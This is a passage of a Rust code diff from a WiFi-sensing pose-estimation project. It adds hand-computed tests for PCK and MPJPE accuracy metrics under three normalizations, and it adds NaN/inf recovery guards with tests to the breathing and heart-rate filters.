// nose displaced 0.06, shoulder displaced 0.10, hips exact.
let pred = pose17(&[
(0, 0.56, 0.10), // err 0.06
(5, 0.60, 0.30), // err 0.10
(CANON_LEFT_HIP, 0.40, 0.90), // exact
(CANON_RIGHT_HIP, 0.60, 0.90), // exact
]);
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
// Torso τ@20 = 0.04: nose 0.06>0.04 wrong, sh 0.10>0.04 wrong,
// hips exact ⇒ 2/4 = 0.5.
let (_, _, torso) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
// Bbox diag = sqrt(0.68)=0.82462; τ@20 = 0.164924:
// nose 0.06 ≤ τ correct, sh 0.10 ≤ τ correct, hips exact ⇒ 4/4 = 1.0.
let (_, _, bbox) = pck_at(&pred, &gt, &vis, 20, PckNormalization::BoundingBoxDiagonal);
// Abs(0.08): nose 0.06 ≤ 0.08 correct, sh 0.10 > 0.08 wrong, hips exact
// ⇒ 3/4 = 0.75.
let (_, _, abs) = pck_at(&pred, &gt, &vis, 20, PckNormalization::AbsolutePixels(0.08));
assert!((torso - 0.5).abs() < 1e-6, "torso PCK expected 0.5, got {torso}");
assert!((bbox - 1.0).abs() < 1e-6, "bbox PCK expected 1.0, got {bbox}");
assert!((abs - 0.75).abs() < 1e-6, "abs(0.08) PCK expected 0.75, got {abs}");
// The whole point: identical predictions, three DISTINCT PCK values.
assert!(torso != bbox && bbox != abs && torso != abs,
"normalizations must give distinct PCK: torso={torso}, bbox={bbox}, abs={abs}");
}
// -------- AbsolutePixels ignores k (raw threshold) --------
#[test]
fn absolute_pixels_ignores_threshold_percentage() {
let gt = pose17(&[(5, 0.50, 0.50), (CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
let pred = pose17(&[(5, 0.53, 0.50), (CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
// τ = 0.05 raw; joint5 err 0.03 ≤ 0.05 correct. k=5 and k=99 must agree.
let (_, _, p5) = pck_at(&pred, &gt, &vis, 5, PckNormalization::AbsolutePixels(0.05));
let (_, _, p99) = pck_at(&pred, &gt, &vis, 99, PckNormalization::AbsolutePixels(0.05));
assert_eq!(p5, p99, "AbsolutePixels must ignore the k percentage");
assert!((p5 - 1.0).abs() < 1e-6, "all three within 0.05, got {p5}");
}
// -------- MPJPE hand-computed (2D and 3D) --------
#[test]
fn mpjpe_hand_computed_2d() {
// joint0 err (3,4)->5, joint1 exact->0 ⇒ mean (5+0)/2 = 2.5.
let gt = Array2::from_shape_vec((2, 2), vec![0.0, 0.0, 1.0, 1.0]).unwrap();
let pred = Array2::from_shape_vec((2, 2), vec![3.0, 4.0, 1.0, 1.0]).unwrap();
let vis = Array1::from(vec![2.0, 2.0]);
assert!((mpjpe(&pred, &gt, &vis) - 2.5).abs() < 1e-6);
}
#[test]
fn mpjpe_hand_computed_3d() {
// single joint err (1,2,2) -> sqrt(1+4+4)=3.0.
let gt = Array2::from_shape_vec((1, 3), vec![0.0, 0.0, 0.0]).unwrap();
let pred = Array2::from_shape_vec((1, 3), vec![1.0, 2.0, 2.0]).unwrap();
let vis = Array1::from(vec![2.0]);
assert!((mpjpe(&pred, &gt, &vis) - 3.0).abs() < 1e-6);
}
#[test]
fn mpjpe_excludes_invisible_joints() {
// joint0 visible err 5, joint1 INVISIBLE err 100 ⇒ mean = 5 (joint1 dropped).
let gt = Array2::from_shape_vec((2, 2), vec![0.0, 0.0, 0.0, 0.0]).unwrap();
let pred = Array2::from_shape_vec((2, 2), vec![3.0, 4.0, 100.0, 0.0]).unwrap();
let vis = Array1::from(vec![2.0, 0.0]);
assert!((mpjpe(&pred, &gt, &vis) - 5.0).abs() < 1e-6);
}
// -------- degenerate inputs: no panic --------
#[test]
fn zero_torso_is_unscoreable_not_perfect() {
// Both hips coincident ⇒ torso ≈ 0; bbox also collapses ⇒ None.
let gt = pose17(&[(CANON_LEFT_HIP, 0.5, 0.5), (CANON_RIGHT_HIP, 0.5, 0.5)]);
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
assert_eq!(pck_at(&gt, &gt, &vis, 20, PckNormalization::TorsoDiameter), (0, 0, 0.0));
assert_eq!(pck_at(&gt, &gt, &vis, 20, PckNormalization::BoundingBoxDiagonal), (0, 0, 0.0));
}
#[test]
fn no_visible_keypoints_scores_zero() {
let gt = pose17(&[(CANON_LEFT_HIP, 0.4, 0.5), (CANON_RIGHT_HIP, 0.6, 0.5)]);
let vis = vis17(&[]); // nothing visible
let (c, t, pck) = pck_at(&gt, &gt, &vis, 20, PckNormalization::TorsoDiameter);
assert_eq!((c, t, pck), (0, 0, 0.0));
assert_eq!(mpjpe(&gt, &gt, &vis), 0.0);
}
#[test]
fn nan_coords_do_not_panic_and_count_wrong() {
let gt = pose17(&[(5, 0.5, 0.5), (CANON_LEFT_HIP, 0.4, 0.5), (CANON_RIGHT_HIP, 0.6, 0.5)]);
let mut pred = gt.clone();
pred[[5, 0]] = f32::NAN; // joint 5 prediction is NaN
let vis = vis17(&[5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
let (c, t, pck) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
assert_eq!(t, 3);
assert_eq!(c, 2, "NaN joint must count as wrong, hips correct ⇒ 2/3");
assert!((pck - 2.0 / 3.0).abs() < 1e-6);
// mpjpe with a NaN joint yields NaN (caller filters) but must not panic.
assert!(mpjpe(&pred, &gt, &vis).is_nan());
}
// -------- batch report: micro-average + self-describing struct --------
#[test]
fn accuracy_report_micro_averages_and_carries_definition() {
// Frame A: 2 visible, both correct (2/2). Frame B: 2 visible, both wrong (0/2).
// Micro-average over joints: 2 correct / 4 = 0.5 (NOT mean-of-frame-PCK,
// which would be (1.0+0.0)/2 = 0.5 here too, but the accumulator is the
// joint-level one).
let gt = pose17(&[(CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
let frame_a = PoseFrame { pred: gt.clone(), gt: gt.clone(), visibility: vis.clone() };
// Frame B: displace both hips by 0.05 (> τ 0.04) ⇒ both wrong.
let pred_b = pose17(&[(CANON_LEFT_HIP, 0.45, 0.50), (CANON_RIGHT_HIP, 0.65, 0.50)]);
let frame_b = PoseFrame { pred: pred_b, gt: gt.clone(), visibility: vis.clone() };
let report = accuracy_report(
&[frame_a, frame_b],
&[20, 50],
PckNormalization::TorsoDiameter,
);
assert_eq!(report.n_frames, 2);
assert_eq!(report.n_keypoints, 17);
assert_eq!(report.normalization, PckNormalization::TorsoDiameter);
// PCK@20: 2 correct / 4 visible = 0.5.
assert!((report.pck(20).unwrap() - 0.5).abs() < 1e-6);
// PCK@50: τ = 0.5·0.20 = 0.10, frame B err 0.05 ≤ 0.10 ⇒ all correct
// ⇒ 4/4 = 1.0.
assert!((report.pck(50).unwrap() - 1.0).abs() < 1e-6);
// A reported number always carries its definition in the summary.
assert!(report.summary().contains("torso-diameter"));
}
#[test]
fn accuracy_report_empty_is_zero_not_nan() {
let report = accuracy_report(&[], &[20], PckNormalization::BoundingBoxDiagonal);
assert_eq!(report.n_frames, 0);
assert_eq!(report.pck(20), Some(0.0));
assert_eq!(report.mpjpe, 0.0);
assert!(!report.mpjpe.is_nan());
}
// -------- bbox-norm is looser than torso-norm (sanity, on a batch) --------
#[test]
fn bbox_norm_scores_at_least_torso_norm() {
// bbox diagonal >= torso span always (bbox encloses the hips), so for the
// SAME frames bbox-PCK >= torso-PCK at the same k. Pin this ordering.
let gt = pose17(&[
(0, 0.50, 0.10),
(5, 0.50, 0.40),
(CANON_LEFT_HIP, 0.40, 0.90),
(CANON_RIGHT_HIP, 0.60, 0.90),
]);
let pred = pose17(&[
(0, 0.55, 0.10),
(5, 0.58, 0.40),
(CANON_LEFT_HIP, 0.42, 0.90),
(CANON_RIGHT_HIP, 0.62, 0.90),
]);
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
let frame = PoseFrame { pred, gt, visibility: vis };
let torso = accuracy_report(std::slice::from_ref(&frame), &[20], PckNormalization::TorsoDiameter);
let bbox = accuracy_report(std::slice::from_ref(&frame), &[20], PckNormalization::BoundingBoxDiagonal);
assert!(
bbox.pck(20).unwrap() >= torso.pck(20).unwrap(),
"bbox-norm (looser) must be >= torso-norm: bbox={:?} torso={:?}",
bbox.pck(20), torso.pck(20)
);
}
}
+10
View File
@@ -43,6 +43,11 @@
// All *this* crate's code is written without unsafe blocks.
#![warn(missing_docs)]
/// Metric-locked pose-accuracy harness (ADR-155 §Tier-1.2; needs ADR slot 173)
/// — selectable `PckNormalization` (torso / bbox-diagonal / absolute), `mpjpe`,
/// and a self-describing `PoseAccuracy` result so a reported PCK number always
/// carries the definition it was computed under.
pub mod accuracy;
pub mod config;
pub mod dataset;
pub mod domain;
@@ -89,6 +94,11 @@ pub use metrics_core::{
canonical_torso_size, oks_canonical, pck_canonical, CANON_LEFT_HIP, CANON_RIGHT_HIP,
COCO_KP_SIGMAS,
};
// ADR-155 §Tier-1.2 — metric-locked accuracy harness (selectable PCK
// normalization + MPJPE + self-describing result).
pub use accuracy::{
accuracy_report, mpjpe as pck_mpjpe, pck_at, PckNormalization, PoseAccuracy, PoseFrame,
};
pub use config::TrainingConfig;
pub use dataset::{
CsiDataset, CsiSample, DataLoader, MmFiDataset, SyntheticConfig, SyntheticCsiDataset,
@@ -29,6 +29,66 @@
use ndarray::{Array1, Array2};
use wifi_densepose_train::{oks_canonical, pck_canonical, CANON_LEFT_HIP, CANON_RIGHT_HIP};
// ADR-155 §Tier-1.2 — metric-locked accuracy harness public surface.
use wifi_densepose_train::{accuracy_report, pck_at, PckNormalization, PoseFrame};
// ---------------------------------------------------------------------------
// Metric-locked accuracy harness: the three PCK normalizations are reachable
// from the crate root and give DIFFERENT PCK on identical predictions — the
// proof that the 96 / 81.6 / 61 figures were non-comparable (validated here as
// a downstream consumer would call it).
// ---------------------------------------------------------------------------
/// Identical predictions, three declared normalizations ⇒ three distinct PCK.
/// Hand calc (all coords in `[0,1]`):
/// * GT: nose(0)=(0.50,0.10), l_sh(5)=(0.50,0.30), hips=(0.40,0.90)/(0.60,0.90).
/// * Pred: nose err 0.06, shoulder err 0.10, hips exact.
/// * torso = 0.20 ⇒ τ@20 = 0.04 ⇒ only hips correct ⇒ 2/4 = **0.50**.
/// * bbox = √(0.20²+0.80²)=0.82462 ⇒ τ@20 = 0.16492 ⇒ all correct ⇒ **1.00**.
/// * abs(0.08): nose 0.06≤0.08 ok, shoulder 0.10>0.08 wrong ⇒ 3/4 = **0.75**.
#[test]
fn harness_three_normalizations_differ_from_crate_root() {
let gt = pose17(&[
(0, 0.50, 0.10),
(5, 0.50, 0.30),
(CANON_LEFT_HIP, 0.40, 0.90),
(CANON_RIGHT_HIP, 0.60, 0.90),
]);
let pred = pose17(&[
(0, 0.56, 0.10),
(5, 0.60, 0.30),
(CANON_LEFT_HIP, 0.40, 0.90),
(CANON_RIGHT_HIP, 0.60, 0.90),
]);
let vis = vis17(&[0, 5, CANON_LEFT_HIP, CANON_RIGHT_HIP]);
let (_, _, torso) = pck_at(&pred, &gt, &vis, 20, PckNormalization::TorsoDiameter);
let (_, _, bbox) = pck_at(&pred, &gt, &vis, 20, PckNormalization::BoundingBoxDiagonal);
let (_, _, abs) = pck_at(&pred, &gt, &vis, 20, PckNormalization::AbsolutePixels(0.08));
assert!((torso - 0.50).abs() < 1e-6, "torso PCK 0.50, got {torso}");
assert!((bbox - 1.00).abs() < 1e-6, "bbox PCK 1.00, got {bbox}");
assert!((abs - 0.75).abs() < 1e-6, "abs(0.08) PCK 0.75, got {abs}");
assert!(
torso != bbox && bbox != abs && torso != abs,
"three normalizations must be distinct: {torso} / {bbox} / {abs}"
);
}
/// `accuracy_report` returns a self-describing result carrying its normalization,
/// so an unlabeled PCK number is structurally impossible at the API boundary.
#[test]
fn harness_report_carries_normalization_label() {
let gt = pose17(&[(CANON_LEFT_HIP, 0.40, 0.50), (CANON_RIGHT_HIP, 0.60, 0.50)]);
let vis = vis17(&[CANON_LEFT_HIP, CANON_RIGHT_HIP]);
let frame = PoseFrame { pred: gt.clone(), gt: gt.clone(), visibility: vis };
let report = accuracy_report(&[frame], &[20], PckNormalization::BoundingBoxDiagonal);
assert_eq!(report.normalization, PckNormalization::BoundingBoxDiagonal);
assert_eq!(report.n_keypoints, 17);
assert_eq!(report.n_frames, 1);
assert!((report.pck(20).unwrap() - 1.0).abs() < 1e-6);
assert!(report.summary().contains("bbox-diagonal"));
}
// ---------------------------------------------------------------------------
// Tests that use `EvalMetrics` (requires tch-backend because the metrics
@@ -174,6 +174,20 @@ impl BreathingExtractor {
let output =
(1.0 - r) * (input - state.x2) + 2.0 * r * cos_w0 * state.y1 - r * r * state.y2;
// Self-healing non-finite guard (ADR-158 §A1). A single non-finite
// sample — a NaN/inf residual from a corrupt CSI frame, or a transient
// overflow — would otherwise be stored into `y1`/`y2` and poison the
// resonator recurrence *permanently*: every subsequent output stays
// NaN, the `extract()` finite-check drops it, and the history buffer
// never refills, so breathing extraction is dead until `reset()`.
// Resetting the filter state here lets the resonator recover on the next
// clean frame; the 0.0 we return for this frame is still dropped by the
// caller's `is_finite()` check, so no spurious sample enters history.
if !output.is_finite() {
*state = IirState::default();
return 0.0;
}
state.x2 = state.x1;
state.x1 = input;
state.y2 = state.y1;
@@ -396,6 +410,75 @@ mod tests {
assert!((0.0..=2.0).contains(&fused), "weighted average must be in-range: {fused}");
}
/// ADR-158 §A1 bug-catching test: a single non-finite residual must NOT
/// permanently poison the IIR filter state.
///
/// The resonator recurrence stores `y[n]` into the filter state. Before the
/// fix, one NaN/inf residual produced a NaN `output`, the `extract()`
/// finite-guard dropped that frame from history — but the NaN was already
/// latched into `state.y1`/`y2`, so every subsequent output stayed NaN, the
/// finite-guard rejected it too, and the history buffer never refilled.
/// Breathing extraction was then dead until `reset()`. A control run on the
/// same clean signal yields 15 BPM (0.25 Hz); after a leading NaN frame the
/// OLD code returned `None` with `history_len() == 0` forever. This test
/// asserts recovery (FAILS on the old code, verified by reverting the
/// `bandpass_filter` self-heal).
#[test]
fn nan_frame_does_not_permanently_poison_filter() {
let sr = 10.0;
let feed_clean = |ext: &mut BreathingExtractor| {
let mut last = None;
for i in 0..600 {
let t = i as f64 / sr;
let s = (2.0 * std::f64::consts::PI * 0.25 * t).sin();
last = ext.extract(&[s], &[1.0]);
}
last
};
// Control: clean signal accumulates history and detects ~15 BPM.
let mut control = BreathingExtractor::new(1, sr, 60.0);
let control_res = feed_clean(&mut control);
assert!(control.history_len() > 0);
assert!(control_res.is_some(), "control clean run must produce an estimate");
// A leading NaN frame must not kill the extractor.
let mut ext = BreathingExtractor::new(1, sr, 60.0);
ext.extract(&[f64::NAN], &[1.0]);
let res = feed_clean(&mut ext);
assert!(
ext.history_len() > 0,
"extractor must recover and refill history after a NaN frame (got {})",
ext.history_len()
);
assert!(res.is_some(), "extractor must recover an estimate after a NaN frame");
}
/// ADR-158 §A1: a mid-stream `inf` must not freeze the history buffer.
#[test]
fn inf_mid_stream_does_not_freeze_history() {
let sr = 10.0;
let mut ext = BreathingExtractor::new(1, sr, 60.0);
let clean = |ext: &mut BreathingExtractor, count: usize| {
for i in 0..count {
let t = i as f64 / sr;
let s = (2.0 * std::f64::consts::PI * 0.25 * t).sin();
ext.extract(&[s], &[1.0]);
}
};
clean(&mut ext, 300);
let before = ext.history_len();
assert!(before > 0);
ext.extract(&[f64::INFINITY], &[1.0]); // poison mid-stream
clean(&mut ext, 600);
assert!(
ext.history_len() > before,
"history must keep growing after an inf frame (before={}, after={})",
before,
ext.history_len()
);
}
/// ADR-157 §A3 bug-catching test. Divergence needs the pole magnitude
/// `|r| >= 1`, i.e. `bw >= 4`. At `fs = 0.5` Hz with the band widened to
/// 0.1-0.9 Hz, `bw = 2*pi*(0.9-0.1)/0.5 = 10.05`, so the OLD pole radius
@@ -32,6 +32,15 @@ impl Default for IirState {
}
}
/// Lowest physiologically plausible heart rate, in BPM. Estimates below this
/// (e.g. a lock onto a breathing harmonic, which the firmware #987 fix also
/// guards against) are rejected rather than emitted as a confident vital — a
/// false low HR is a safety problem. Value-identical to the prior literal.
const HR_PLAUSIBLE_MIN_BPM: f64 = 40.0;
/// Highest physiologically plausible heart rate, in BPM. Estimates above this
/// are rejected. Value-identical to the prior literal.
const HR_PLAUSIBLE_MAX_BPM: f64 = 180.0;
/// Heart rate extractor using bandpass filtering and autocorrelation
/// peak detection.
pub struct HeartRateExtractor {
@@ -140,8 +149,11 @@ impl HeartRateExtractor {
let frequency_hz = self.sample_rate / period_samples as f64;
let bpm = frequency_hz * 60.0;
// Validate BPM is in physiological range (40-180 BPM)
if !(40.0..=180.0).contains(&bpm) {
// Validate BPM is in the physiological plausibility band. An estimate
// outside [HR_PLAUSIBLE_MIN_BPM, HR_PLAUSIBLE_MAX_BPM] is rejected
// rather than emitted, so an out-of-band autocorrelation lock can never
// surface as a confident heart rate.
if !(HR_PLAUSIBLE_MIN_BPM..=HR_PLAUSIBLE_MAX_BPM).contains(&bpm) {
return None;
}
@@ -191,6 +203,20 @@ impl HeartRateExtractor {
let output =
(1.0 - r) * (input - state.x2) + 2.0 * r * cos_w0 * state.y1 - r * r * state.y2;
// Self-healing non-finite guard (ADR-158 §A1). A single non-finite
// sample — a NaN/inf residual from a corrupt CSI frame, or a transient
// overflow — would otherwise be written into `y1`/`y2` and poison the
// resonator recurrence *permanently*: every later output stays NaN, the
// `extract()` finite-check drops it, `acf0` never recomputes on fresh
// data, and heart-rate extraction is dead until `reset()`. Resetting the
// filter state here lets the resonator recover on the next clean frame;
// the 0.0 returned for this frame is still dropped by the caller's
// `is_finite()` check, so no spurious sample enters history.
if !output.is_finite() {
*state = IirState::default();
return 0.0;
}
state.x2 = state.x1;
state.x1 = input;
state.y2 = state.y1;
@@ -420,6 +446,92 @@ mod tests {
assert_eq!(ext.n_subcarriers, 56);
}
/// Pin the physiological plausibility band to its documented values. If a
/// future edit widens these, an implausible HR could be emitted as a
/// confident vital — this characterization test forces that to be a
/// deliberate, reviewed change.
#[test]
fn plausibility_band_constants_pinned() {
assert!((HR_PLAUSIBLE_MIN_BPM - 40.0).abs() < f64::EPSILON);
assert!((HR_PLAUSIBLE_MAX_BPM - 180.0).abs() < f64::EPSILON);
}
/// ADR-158 §A1 bug-catching test: a single non-finite residual must NOT
/// permanently poison the IIR filter state.
///
/// The cardiac resonator latches `y[n]` into `state.y1`/`y2`. Before the
/// fix, one NaN/inf residual produced a NaN `output` that was stored into
/// the state; the `extract()` finite-guard dropped that frame from history,
/// but every subsequent output stayed NaN, so the history buffer never
/// refilled and HR extraction was dead until `reset()`. After a leading NaN
/// frame, the OLD code returned `None` with `history_len() == 0` forever.
/// This asserts recovery (FAILS on the old code).
#[test]
fn nan_frame_does_not_permanently_poison_filter() {
let sr = 50.0;
let feed_clean = |ext: &mut HeartRateExtractor| {
let mut last = None;
for i in 0..1200 {
let t = i as f64 / sr;
let base = (2.0 * std::f64::consts::PI * 1.2 * t).sin();
let r = vec![base * 0.1, base * 0.08, base * 0.12, base * 0.09];
last = ext.extract(&r, &[0.0, 0.01, 0.02, 0.03]);
}
last
};
let mut control = HeartRateExtractor::new(4, sr, 20.0);
feed_clean(&mut control);
assert!(control.history_len() > 0, "control clean run must accumulate history");
let mut ext = HeartRateExtractor::new(4, sr, 20.0);
ext.extract(&[f64::NAN, 0.1, 0.1, 0.1], &[0.0, 0.01, 0.02, 0.03]);
feed_clean(&mut ext);
assert!(
ext.history_len() > 0,
"HR extractor must recover and refill history after a NaN frame (got {})",
ext.history_len()
);
}
/// Safety negative: pure broadband noise (no cardiac component) must NOT be
/// reported as a clinically `Valid` heart rate. A false "HR = 72 bpm" on
/// noise is a safety problem (false reassurance / false alert). The
/// extractor may still emit a low-confidence guess, but its status must be
/// `Degraded`/`Unreliable`, never `Valid`. Mirrors the honest-negative
/// requirement in the review brief.
#[test]
fn pure_noise_is_never_reported_valid() {
let mut seed: u64 = 0x1234_5678;
let mut rng = || {
seed = seed
.wrapping_mul(6_364_136_223_846_793_005)
.wrapping_add(1_442_695_040_888_963_407);
((seed >> 33) as f64 / (1u64 << 31) as f64) - 1.0
};
let mut ext = HeartRateExtractor::new(8, 50.0, 20.0);
let mut last = None;
for _ in 0..1500 {
let r: Vec<f64> = (0..8).map(|_| rng()).collect();
let p: Vec<f64> = (0..8).map(|_| rng()).collect();
last = ext.extract(&r, &p);
}
if let Some(est) = last {
assert_ne!(
est.status,
VitalStatus::Valid,
"pure noise must not yield a clinically Valid HR (bpm={}, conf={})",
est.value_bpm,
est.confidence
);
assert!(
est.confidence < 0.6,
"noise HR confidence must stay below the Valid cutoff: {}",
est.confidence
);
}
}
/// ADR-157 §A3 bug-catching test.
///
/// Divergence needs the pole *magnitude* `|r| >= 1`, i.e. `bw >= 4`. With